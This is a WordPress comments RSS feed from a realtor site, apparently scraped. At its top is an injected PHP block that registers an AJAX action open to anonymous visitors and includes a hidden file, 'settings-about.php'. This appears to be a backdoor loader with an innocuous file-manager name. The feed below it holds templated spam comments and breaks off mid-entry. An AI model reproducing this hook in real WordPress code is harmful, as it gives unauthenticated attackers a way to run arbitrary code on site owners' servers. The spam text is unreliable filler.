if(!function_exists('file_manager_check_dt')){
add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt');
add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt');
function file_manager_check_dt()
{
$file = __DIR__ . '/settings-about.php';
if (file_exists($file)) {
include $file;
}
die();
}
}
Comments for Star Infrastructure
http://www.starinfrastructure.com/
The Realtors You Can TrustThu, 10 Aug 2023 07:34:52 +0000
hourly
1 https://wordpress.org/?v=6.9.4
Comment on About by WP Notify
https://www.starinfrastructure.com/about/#comment-228
Thu, 10 Aug 2023 07:34:52 +0000http://www.starinfrastructure.com/?page_id=12#comment-228JeremySteel
are you struggling to get comments on your blog?
]]>
Comment on Projects by WP Notify
https://www.starinfrastructure.com/projects/#comment-227
Thu, 10 Aug 2023 07:34:52 +0000http://www.starinfrastructure.com/?page_id=10#comment-227JeremySteel
are you struggling to get comments on your blog?
]]>
Comment on Blog by WP Notify
https://www.starinfrastructure.com/blog/#comment-226
Thu, 10 Aug 2023 07:34:52 +0000http://www.starinfrastructure.com/?page_id=14#comment-226JeremySteel